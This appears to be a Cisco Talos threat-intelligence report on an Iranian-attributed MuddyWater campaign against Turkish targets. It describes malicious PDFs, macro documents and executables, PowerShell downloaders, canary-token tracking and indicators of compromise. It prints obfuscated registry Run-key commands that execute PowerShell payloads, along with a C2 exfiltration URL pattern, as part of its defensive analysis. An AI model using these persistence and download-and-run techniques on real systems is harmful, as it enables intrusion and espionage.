Cisco Talos has observed a new campaign targeting Turkish private organizations  alongside governmental institutions.

  • Talos attributes this campaign with high confidence to MuddyWater — an APT group recently attributed to Iran's Ministry of Intelligence and Security (MOIS) by the U.S. Cyber Command.
  • This campaign utilizes malicious PDFs, XLS files and Windows executables to deploy malicious PowerShell-based downloaders acting as initial footholds into the target's enterprise. MuddyWater's use of script based components such as obfuscated PowerShell based downloaders is also a tactic described in the advisory from January 2021 by the U.S. Cyber Command.
  • This campaign also utilizes canary tokens to track successful infection of targets, a new addition to this group's arsenal of tactics, techniques and procedures (TTPs).
  • This specific method of taking advantage of canary tokens in this campaign may also be a measure to evade sandbox based detection systems.
  • A highly motivated threat actor such as MuddyWater can use unauthorized access to conduct espionage, intellectual property theft and deploy ransomware and destructive malware in an enterprise.

Executive summary

MuddyWater has conducted various campaigns against entities spread throughout the U.S.A, Europe, Middle East and South Asia.

A typical TTP employed by the group is the heavy use of scripting in their infection chains using languages like PowerShell and Visual Basic coupled with the frequent use of living-off-the-land binaries (LoLBins).

Cisco Talos recently observed a campaign operated by MuddyWater targeting users in Turkey. This campaign consists of the use of malicious PDFs and Microsoft Office documents (maldocs) to serve as the initial infection vector. These maldocs were named in such a way as to masquerade as legitimate documents from the Turkish Health and Interior Ministries.

Next, the malware executes a series of scripts deployed on the infected endpoint to serve as downloaders and instrumentors for additional payloads.

We've also discovered the use of flags or tokens in attacks conducted by this threat actor in this campaign. These tokens are meant to signal a successful infection of a target by the group's malicious artifacts.

MuddyWater threat actor

MuddyWater, also known as MERCURY or Static Kitten, is an APT group recently attributed to Iran's Ministry of Intelligence and Security (MOIS) by U.S. Cyber Command. This threat actor, active since at least 2017, frequently conducts campaigns against high-value targets in American, European and Asian countries. Campaigns carried out by the threat actor aim to achieve either of three outcomes:

  • Espionage  - Supporting the political dominance of the nation state in the Middle East. This is business as usual for the threat actor, motivated by nation-state interests.
  • Intellectual property theft - Enables economic advantages to the nation state. This goal is accomplished by carrying out aggressive campaigns against private entities and government affiliated institutions such as universities and research entities.
  • Ransomware attacks - MuddyWater has previously attempted to deploy ransomware such as Thanos on victim networks to either destroy evidence of their intrusions or disrupt operations of private organizations.

This group frequently relies on the use of DNS as part of their means to contact the command and control (C2), while the initial contact with hosting servers is done via HTTP. Their initial payloads usually use PowerShell and Visual Basic scripting along with LoLBins to assist in the initial stages of the infection.

Campaign targeting Turkey

Talos recently observed a campaign operating as recently as November 2021, which we attribute with high confidence to the MuddyWater group, targeting Turkish government entities, including the Scientific And Technological Research Council of Turkey — Tubitak. This campaign consisted of the use of malicious excel documents (XLS maldocs) and executables stored on a file hosting domain "snapfile[.]org", which would be delivered to the victims in the form of PDF documents with embedded links.

These maldocs, hosted on attacker-controlled or public media-sharing websites are downloaded by malicious PDFs meant to trick the targets into downloading and opening the maldocs. Based on historic evidence of similar campaigns conducted by MuddyWater, it is highly likely that these PDFs served as the initial entry points to the attacks and were distributed via email messages as part of spear-phishing efforts conducted by the group.

Malicious Excel sheets analyses

Talos identified a set of malicious Microsoft Excel spreadsheet files distributed with Turkish language names. Some of these files were named to masquerade as legitimate documents from the Turkish Health and Interior Ministries.

Another file discovered was called "Teklif_form_onaylı.xls," which can be translated to "Offer_form_approved.xls" from Turkish. Analysis of the maldocs deployed in this campaign demonstrates a clear evolution of their implementation culminating into versions that are fully obfuscated.

The documents have some subtle changes — almost like different versions — were being tested. Older documents had some information in the document's metadata, such as the title field "Sayyid"' and author name "Aurelia". These initial versions also consisted of an un-obfuscated PowerShell payload in the document's comments fields. Subsequent iterations of the maldocs saw progressive obfuscation of various malicious code blocks.

Now, the maldocs consist of malicious VBA macros meant to instrument the infection chain. Overall, the macro contained in all the maldocs accomplished the same set of functionalities without any major evolutions as described below.


The infection chain instrumented by the VBA macros consist of creating three key artifacts on the infected endpoint:

  • Registry key for persistence.
  • Malicious VB script intermediate component that the macro sets up for persistence.
  • Malicious PowerShell-based downloader script: The actual post-infection, payload instrumentor used for executing arbitrary code on the infected endpoint.

The VB script's persistence is set up by creating a malicious Registry Run for the infected user:
HKCU\Software\Microsoft\windows\CurrentVersion\Run | <random>

This campaign relies on the use of a LoLBin to execute the malicious VBScript.

In some instances, the attackers make use of a LoLBin DLL called pcwutl.dll, which is part of the operating system, to execute the VBScript on reboot or re-login. Although the usage of LoLBins is fairly common as a means of lateral movement, it is not commonly used to execute the malicious payload.

Tracking tokens

As the maldocs were evolving, some of the metadata details were removed or generalized, and eventually, the latest versions consisted of obfuscated PowerShell payloads residing in the comments field.

The malicious VBA macros consisted of the same set of functionalities for creating the malicious VBS and PS1 scripts, and achieving persistence across reboots. However, there was one interesting addition to the macro functionality now. The latest versions of the VBA code deployed could make HTTP requests to a canary token from

Canary tokens are tokens that can be embedded in objects like documents, web pages and emails. When that object is opened, an HTTP request to is generated, alerting the token's owner that the object was opened.

The canary token is typically silently executed twice during the execution of the macro. In cooperation with, a list of other tokens created by the same user was added to the IOC section below.

An attacker may use such tokens to serve one or more purposes such as:

  • Tracking Tokens: A way of tracking who is detonating the malicious code, keeping track of successful infections.
  • Tracking tokens can be an anti-analysis method. In this campaign, the server that hosts the final payload may only deliver if it first receives two almost simultaneous requests to the token. This would thwart researchers that solely request the payload from the server without registering with the canary tokens using an HTTP request.
  • Tracking tokens may also be used as another means of anti-analysis: timing checks. The infection chain consists of a PS1-based downloader and two sets of HTTP requests for the canary tokens. A reasonable timing check on the duration between the token requests and the request to download a payload can indicate automated analysis. Automated sandboxed systems would typically execute the malicious macro generating the token requests. A sandbox would also identify the creation of the registry Run key and re-login the infected user to execute the malicious PS1 that generates the request to download the next payload. Typically, since sandbox-based analysis systems spin up analysis environments for a limited number of minutes, the token requests and payload requests wouldn't be too far apart from each other temporally. A substantially low interval between the HTTP token requests and PS1 requesting the payload may indicate automated analysis of the maldocs and can be used to block payload requests from the infected endpoint.
  • Tracking tokens can also be a method to detect the blocking of the payload server. If they keep receiving requests to the token but not to the payload server, that is an indication of their payload server being blocked, and by whom.

Intermediate VB Script component (VBS)

The VBS file is a straightforward executor of the PowerShell script dropped by the macro to disk.

VBS executing the PS1 on the endpoint.

Malicious PowerShell-based downloader

The PowerShell script deployed in the attack is meant to download and execute the next payload (also a PS1 script) on the infected endpoint. This PS1 script resides in the metadata of the maldoc and is dropped by the macro.

Primitive versions of the maldocs consisted of unobfuscated versions of the PS1 script, with obfuscations being introduced in newer versions.

PS1 downloader script.

The PowerShell script that downloads another PowerShell from a remote location which will then be executed. It tries twice, with a custom timeout of 40 seconds and a custom user agent, which is appended with the character "|" separator and the username executing the script. In other versions of script, the "|" character is not appended.

The fact that the downloader script attempts the download of the payload twice with a big timeout further indicates that the canarytokens serve the purpose of anti-analysis. That is, the C2 may need more time to check if the canarytokens have been accessed before it delivers the final payload. We could not obtain the final payload, but our tests indicate that there was some kind of verification process being performed prior to the delivery of the payload.

Infection chain

The delivery mechanism for this campaign is the distribution of PDF files containing embedded links. Talos found at least two PDF files which shared the same author name, "nejla" , in the metadata. The PDF files typically show an error message and ask the user to click on a link to resolve the issue and display the correct format/extension of the document.

Once the victim clicks on the download button, the endpoint receives a second stage, which can be either a malicious XLS file or a Windows executable that proceeds with the infection as described earlier.

The maldoc-based infection chain is as follows:

Malicious executables-based infection chain

The initial delivery mechanism of the infection chains consists of the malicious PDF files as the first stage. The URLs corresponding to the download button in the PDF files will typically host the malicious XLS files containing the macros that deploy the subsequent VBS and PS1 scripts.

We have, however, recently observed a variation of this infection chain. This second variation consists of the PDF pointing to a URL that delivers a Windows executable (EXE) in the infection chain instead of the malicious XLS files.

The EXEs are meant to instrument a similar infection chain consisting of the intermediate VBS and final PS1-based downloaders.


The EXEs typically use a Turkish name indicating that they can either be delivered via the malicious PDFs or distributed independently. One example of an executable was named "Surec_No_cc2021-pdf377811f-66ad-4397-bd35-3247101e2fda-eta332018.exe" which can be translated from Turkish as "Period_No_<...>32018.exe."

Once executed, the sample drops a text file in the victim's temporary folder. This is actually a decoy PDF or Office document in hex format. During execution, the hex representation of the decoy document is hexlified to create a readable copy in the %temp% folder. The decoy will then be opened by the system PDF or document reader and displayed to the victim.

Once the decoy document has been displayed to the victim, the executable starts its main malicious task: Downloading and executing malicious PowerShell scripts served to it by a remote location. Here, we see that the intermediate VBS scripts used in the maldoc based infection chain have been replaced with a PowerShell-based implementation.

The implant will first create a directory in the user's home folder. This directory will be used to store two PowerShell scripts:

  • Instrumentor script used to activate the next stage from disk called ".CloudCache.conf."
  • Downloader script used to download the next stage from a remote location for execution on the endpoint called ".CloudDrive.conf."

Just like maldoc-based infections, a registry key is created at HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN | <Some Application Name> for persistence.

For example:


The registry Run key takes advantage of lolbins to run the payload. In this case, it uses SyncAppvPublishingServer.vbs to execute PowerShell code, which will execute the code stored in the instrumentor script (".CloudCache.conf"):


"CloudDrive"="C:\\Windows\\System32\\SyncAppvPublishingServer.vbs \"n;.('{2}{0}{1}' -f[string][char][int]101,[string][char][int]88,'i')((.('{2}{0}{1}' -f[string][char][int]101,[string][char][int]88,'i')((Get-content $env:USERPROFILE\\.CloudDrive\\.CloudCache.conf))))\""

The instrumentor script is responsible for base64 decoding the contents of the downloader (the second PS1 script) and executing it on the endpoint.

Contents of the instrumentor PS1 .CloudCache.ps1.

The second PS1 script is the actual downloader of the next stage of PowerShell code that is run on the infected endpoint. It downloads the next stage of PowerShell code from a remote location and executes it on the infected endpoint.

Downloader script.

Unfortunately, there was no way for us to download the final payload.


Another version of the executable deployed by the attacker in August 2021 targeted Pakistani entities. We are unsure at this time whether the November 2021 targeting of Turkish users is a continuation of this Pakistan-related activity.

This executable again consists of a decoy document presented to the victim followed by the instrumentation of a PowerShell-based downloader script.

This executable also uses the Registry run key for persistence of its artifacts on the system. However, in this case, we saw a variation in the infection chain:

  • The attackers skipped using the instrumentor PS1 script as seen in the latest infection chain (described above).
  • Instead, the attackers configured the Registry run key to execute the downloader script directly via SyncAppvPublishingServer.vbs.


"OwnDrive"="C:\\Windows\\System32\\SyncAppvPublishingServer.vbs \"n;.('{2}{0}{1}' -f[string][char][int]101,[string][char][int]88,'i')([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-content

The downloader script used in this instance consists of capabilities to collect preliminary data, such as the computer name, to register the infection with the C2 server.

The script will then reach out to the C2 for requesting PowerShell commands to execute. The response received is parsed by the implant to check if the computer name sent back by the C2 matches the current computer name. If a match is found, the corresponding PowerShell commands issued by the C2 are executed on the endpoint and the output/response is AES encrypted and returned to the C2.

The URL for returning the output of a command executed on the system is:

http://<C2_IP>/images?guid=<base64_encoded + AES encrypted output>

The User Agent used for all these communications is: Googlebot/2.1 (+

PS1-based downloader script.

Tracking Tokens

We observed the decoy documents reaching out to a remote location:


Similar URLs on this server were accessed in previously observed MuddyWater campaigns targeting Pakistan.

It is highly likely that the attackers used this server as a token tracker to monitor successful infections in this campaign. This token tracking system was then later migrated to CanaryTokens in September 2021 in the attacks targeting Turkey using the malicious Excel documents (illustrated earlier).


Another example of a similar executable used by the threat actor in June 2021 was one to target the telecommunications sector in Armenia. The decoy document displayed to the victim in this case consists of an internal guide (Maintenance Operation Protocol (MOP)) for Armenia's Viva-MTS telecom solution provider from Ericsson pertaining to their Smart Services Routers (SSRs) and Evolved Packet Gateway (EPG).

Decoy document used while targeting Telecom entities.

What's interesting is that the decoy document was created on June 6, 2021 and modified on June 8. The malicious executable carrying this decoy was generated a day later on June 9, thus, it is likely that either the attackers created the draft of the decoy themselves or had immediate access to their victims that enabled them to exfiltrate documents that were then used as decoys and lures to proliferate their campaigns to similar targets of interest.

The entire infection chain employed in this campaign, using the malicious PowerShell based downloader, was later seen again in the attack targeting Pakistani entities in August 2021.

The EXE-based infection chain is as follows:


Talos assesses with high confidence that these campaigns are the work of the Iranian state-sponsored threat actor MuddyWater. This assessment is based on both technical indicators and the tactics, techniques, and procedures (TTPs) employed by the threat actor. The infection chains used in the campaigns illustrated in this research bear a close resemblance to those described in Secureworks' report from 2020. We also have a high-fidelity IOC from a trusted source that was used in a key part of the infection chains. This IOC has also been used in previous MuddyWater campaigns.

While we cannot disclose additional details at this time due to intelligence sharing sensitivities, we assess that this particular finding is significant enough to justify a high-confidence assessment on attribution.

The malicious XLS lures and the executables used in this campaign deploy two malicious files - a loader and a downloader that retrieve the final payloads using a hardcoded URL pointing to a specific hardcoded IP address. Secureworks' report shows the same technique, albeit based on a batch file and a PowerShell script, while the campaign targeting Turkish entities use either a VBS or PS1 script activated via a simple registry entry. In both cases, the key PowerShell script's only objective is to download malicious payloads from the C2.

Code and metadata similarities in the maldocs and accompanying scripts utilized in this campaign bear a high degree of resemblance to previously discovered MuddyWater artifacts.

(A high-fidelity YARA rule for tracking artifacts related to this campaign and previously discovered MuddyWater artifacts is APT_MuddyWater_MalDoc_Feb20_1, authored by Florian Roth.)

One of the C2 IP addresses used by the malicious PowerShell downloaders deployed in this campaign, 185[.]118[.]167[.]120, is also listed in a Turkish threat advisory dated September 2021.

English translation of a threat advisory from Trakya.

This advisory from the Trakya University in Turkey and a USOM (Turkey National Cyber ​​Incident Response Center) announcement contains an alert to an APT-level attack. The initial attack vector is the email service, with emails sent from the following attacker-owned accounts:

  • sisterdoreencontreve@gmail[.]com
  • lillianwnwindrope@gmail[.]com
  • doctor.x.2020@gmail[.]com
  • ubuntoubunto1398@gmail[.]com
  • a.sara.1995a@gmail[.]com

This advisory lists C2 IP addresses that have also been observed in the this campaign:

  • 185[.]118[.]167[.]120
  • 185[.]118[.]164[.]165
  • 185[.]118[.]164[.]195
  • 185[.]118[.]164[.]213

The bolded IPs (first three in the list) are used by the PowerShell scripts dropped by the malicious XLS lures to download a payload.

Talos confirmed the usage of the email address doctor.x.2020@gmail[.]com listed in the advisory to this campaign using XLS and executables targeting Turkey.


Talos has observed Iranian related groups carry out malicious campaigns all over the world in recent years. 2021 was also prolific in cybersecurity incidents targeting Iranian state-run organizations. These events were attributed to Western nations by the Iranian regime, with the promise of revenge. It's hard to say if these campaigns are the result of such promises or just part of MuddyWater's usual activity.

However, the fact that the threat actors have changed some of their methods of operation and tools is another sign of their adaptability and unwillingness to refrain themselves from attacking other nations. In this post we have shown the same group running two different campaigns using different tools while targeting the same country, in this case Turkey, showing their capacity and motivation to compromise their targets and perform their espionage activities.

In-depth defense strategies based on a risk analysis approach can deliver the best results in the prevention. However, this should always be complemented by a good incident response plan which has been not only tested with table top exercises and reviewed and improved every time it's put to the test on real engagements.


Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on

Snort SIDs for this threat are: 58929-58938.

Orbital Queries

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click below:


We would like to thank Canary Tools for their cooperation, support and inputs into this research.







Other canary tokens used by MuddyWater: